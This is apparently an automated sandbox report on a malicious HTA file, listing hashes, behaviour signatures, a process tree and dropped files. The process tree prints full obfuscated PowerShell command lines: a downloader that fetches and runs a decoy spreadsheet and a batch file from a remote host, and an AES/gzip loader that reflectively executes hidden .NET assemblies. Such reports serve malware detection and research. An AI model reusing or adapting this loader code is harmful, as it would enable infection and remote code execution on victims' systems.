Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system
  • submitted
    17-04-2024 01:11

General

  • Target

    2522c6e717f20b29f38a73dc450a3ad748a14bbe86796429e50eaa672edd5d23.hta

  • Size

    12KB

  • MD5

    1813054fd92c59be0214e8f908d31155

  • SHA1

    3666af3fcd4dbf6d4881afb6e80841c87732569b

  • SHA256

    2522c6e717f20b29f38a73dc450a3ad748a14bbe86796429e50eaa672edd5d23

  • SHA512

    5416b8eebba6bdc80b48fb5c56e78ffa4c260e13513528022ac5f0e2f0ee5831ce3e8e55b5dbe0aadd60e782b7c69891ffd92190863aa4e218c8a5c5fa966869

  • SSDEEP

    192:whpDrcs3f1bF0VXd5uQ45pj3PxFtjQp2QYw:wgefH0lC5pTRo

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\2522c6e717f20b29f38a73dc450a3ad748a14bbe86796429e50eaa672edd5d23.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2704
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function kECMOkR($gdxSDC, $rTnOMRhfVJUY){[IO.File]::WriteAllBytes($gdxSDC, $rTnOMRhfVJUY)};function mumNyknYLgnsVYB($gdxSDC){if($gdxSDC.EndsWith((LSLyBfLILlsvQ @(74696,74750,74758,74758))) -eq $True){rundll32.exe $gdxSDC }elseif($gdxSDC.EndsWith((LSLyBfLILlsvQ @(74696,74762,74765,74699))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $gdxSDC}elseif($gdxSDC.EndsWith((LSLyBfLILlsvQ @(74696,74759,74765,74755))) -eq $True){misexec /qn /i $gdxSDC}else{Start-Process $gdxSDC}};function sSOuincqeTeMefqK($fusnPVMKKSsamabF){$pXfsSsKiwLgzgmXA = New-Object (LSLyBfLILlsvQ @(74728,74751,74766,74696,74737,74751,74748,74717,74758,74755,74751,74760,74766));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$rTnOMRhfVJUY = $pXfsSsKiwLgzgmXA.DownloadData($fusnPVMKKSsamabF);return $rTnOMRhfVJUY};function LSLyBfLILlsvQ($UyfqAHAWGDk){$PuBEDrZXHzyrm=74650;$kKrEoNdYusFnuk=$Null;foreach($FhWJmOIuouGdHGPQ in $UyfqAHAWGDk){$kKrEoNdYusFnuk+=[char]($FhWJmOIuouGdHGPQ-$PuBEDrZXHzyrm)};return $kKrEoNdYusFnuk};function BWGtGqQvhtaMVCwQIH(){$UpkpLddqWxxLFW = $env:AppData + '\';$NYgAUxsoiyj = $UpkpLddqWxxLFW + 'gogi.xlsx';If(Test-Path -Path $NYgAUxsoiyj){Invoke-Item $NYgAUxsoiyj;}Else{ $YEmOvxcFFlsialH = sSOuincqeTeMefqK (LSLyBfLILlsvQ @(74754,74766,74766,74762,74708,74697,74697,74699,74707,74702,74696,74702,74706,74696,74700,74703,74699,74696,74699,74704,74707,74708,74705,74700,74706,74705,74697,74753,74761,74753,74755,74696,74770,74758,74765,74770));kECMOkR $NYgAUxsoiyj $YEmOvxcFFlsialH;Invoke-Item $NYgAUxsoiyj;};$YJtKgLZ = $UpkpLddqWxxLFW + 'gogis.bat'; if (Test-Path -Path $YJtKgLZ){mumNyknYLgnsVYB $YJtKgLZ;}Else{ $WTNqxG = sSOuincqeTeMefqK (LSLyBfLILlsvQ 
@(74754,74766,74766,74762,74708,74697,74697,74699,74707,74702,74696,74702,74706,74696,74700,74703,74699,74696,74699,74704,74707,74708,74705,74700,74706,74705,74697,74753,74761,74753,74755,74765,74696,74748,74747,74766));kECMOkR $YJtKgLZ $WTNqxG;mumNyknYLgnsVYB $YJtKgLZ;};;;;}BWGtGqQvhtaMVCwQIH;
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2268
      • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
        3⤵
        • Enumerates system info in registry
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        PID:2456
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Roaming\gogis.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:308
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\gogis.bat"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1112
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\gogis.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),'LoaAcuudAcuu'.Replace('Acuu', ''),'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),'InvjPegokejPeg'.Replace('jPeg', ''),'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');powershell -w hidden;function nHhmY($bfNRC){$Wqjzg=[System.Security.Cryptography.Aes]::Create();$Wqjzg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Wqjzg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');$Wqjzg.IV=[System.Convert]::($XgWC[12])('mimfsJsCvsdSCjq6OJjGsw==');$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);$mEsqN.Dispose();$Wqjzg.Dispose();$cIvUt;}function Jxpsl($bfNRC){$DhsxW=New-Object System.IO.MemoryStream(,$bfNRC);$abuYQ=New-Object System.IO.MemoryStream;$hMgwC=New-Object System.IO.Compression.GZipStream($DhsxW,[IO.Compression.CompressionMode]::($XgWC[1]));$hMgwC.($XgWC[0])($abuYQ);$hMgwC.Dispose();$DhsxW.Dispose();$abuYQ.Dispose();$abuYQ.ToArray();}$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);$JakZo=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 5).Substring(2))));$GFnOO=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 
6).Substring(2))));[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);[System.Reflection.Assembly]::($XgWC[5])([byte[]]$JakZo).($XgWC[6]).($XgWC[7])($null,$null); "
            5⤵
              PID:1924
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1444

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\09H0XO9NP4R90VZW4LHU.temp

      Filesize

      7KB

      MD5

      2b1970e53746de2d50b99b180974c5fa

      SHA1

      433deefb7aeefe483b1769d8dd822418c3646942

      SHA256

      1d7b48e596efd1afc198ad8759b81ff268d48497a835603bcb2f820de69561e2

      SHA512

      e6cc9cd4f34185b3e9022e387d0471f55f4a3802bf135add5f18bc0a51a799062a45082141326a4e2f0f0e5bcb47c29ab71bdc1b4dbea9ec731a2d666ae338e2

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      217bdfdc543378aaa947fdd913bd1d7e

      SHA1

      973430edf191a2fb3fc0dd0b44461180c87ba748

      SHA256

      f714aaa7c9e1eac325af120d297c276a659d8415eff6073dfea0e3977568a0ba

      SHA512

      a21916d550906d657dacd4e86e77853e638a207a53b80d0f156f4e8aff3cabc1fa59db3a9ec478b7a02c8bccd28c88ec64a2582de4076826ff3b4c69414c635a

    • C:\Users\Admin\AppData\Roaming\gogi.xlsx

      Filesize

      9KB

      MD5

      600c497f3fe2e8ce045dc56ee1edca75

      SHA1

      02fc342d23e3e49c9811592922beb1e4f7d3cfc1

      SHA256

      1235db2b5033bed11ce0586dabd7122f4bab90eb2a4b65a81bba8b884d9c11ed

      SHA512

      ef4a7ad833ea2d7ea0a9b618aee52849e53044d72b737c79e07563ea23d4e181ab5285cc6c7b10e9e18d019d0ea607810d2306e497f394c6ccc1814b3e305809

    • C:\Users\Admin\AppData\Roaming\gogis.bat

      Filesize

      6.9MB

      MD5

      a65e873839228c5b453d6effa5d14d16

      SHA1

      40be429e0e6b41061f3291d10e720eaebf32eda1

      SHA256

      59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951

      SHA512

      84ec1da7d5f5fe236c7fbe960b69d99ae0b6d3fe83844cd2bf3128508d39ad1de35f17dcb101e06fb25b155a806885bb5d6d095fbf3e0a3c729c678fa200f850

    • memory/1444-42-0x0000000002390000-0x00000000023D0000-memory.dmp

      Filesize

      256KB

    • memory/1444-44-0x0000000071CE0000-0x000000007228B000-memory.dmp

      Filesize

      5.7MB

    • memory/1444-47-0x0000000002390000-0x00000000023D0000-memory.dmp

      Filesize

      256KB

    • memory/1444-46-0x0000000002390000-0x00000000023D0000-memory.dmp

      Filesize

      256KB

    • memory/1444-45-0x0000000002390000-0x00000000023D0000-memory.dmp

      Filesize

      256KB

    • memory/1444-43-0x0000000002390000-0x00000000023D0000-memory.dmp

      Filesize

      256KB

    • memory/1444-41-0x0000000071CE0000-0x000000007228B000-memory.dmp

      Filesize

      5.7MB

    • memory/1444-40-0x0000000002390000-0x00000000023D0000-memory.dmp

      Filesize

      256KB

    • memory/1444-39-0x0000000071CE0000-0x000000007228B000-memory.dmp

      Filesize

      5.7MB

    • memory/2268-21-0x0000000002580000-0x00000000025C0000-memory.dmp

      Filesize

      256KB

    • memory/2268-4-0x0000000002580000-0x00000000025C0000-memory.dmp

      Filesize

      256KB

    • memory/2268-33-0x0000000072290000-0x000000007283B000-memory.dmp

      Filesize

      5.7MB

    • memory/2268-5-0x0000000002580000-0x00000000025C0000-memory.dmp

      Filesize

      256KB

    • memory/2268-2-0x0000000072290000-0x000000007283B000-memory.dmp

      Filesize

      5.7MB

    • memory/2268-3-0x0000000072290000-0x000000007283B000-memory.dmp

      Filesize

      5.7MB

    • memory/2268-20-0x0000000002580000-0x00000000025C0000-memory.dmp

      Filesize

      256KB

    • memory/2268-19-0x0000000072290000-0x000000007283B000-memory.dmp

      Filesize

      5.7MB

    • memory/2456-23-0x000000006D4AD000-0x000000006D4B8000-memory.dmp

      Filesize

      44KB

    • memory/2456-7-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2456-8-0x000000006D4AD000-0x000000006D4B8000-memory.dmp

      Filesize

      44KB

    • memory/2456-51-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2456-52-0x000000006D4AD000-0x000000006D4B8000-memory.dmp

      Filesize

      44KB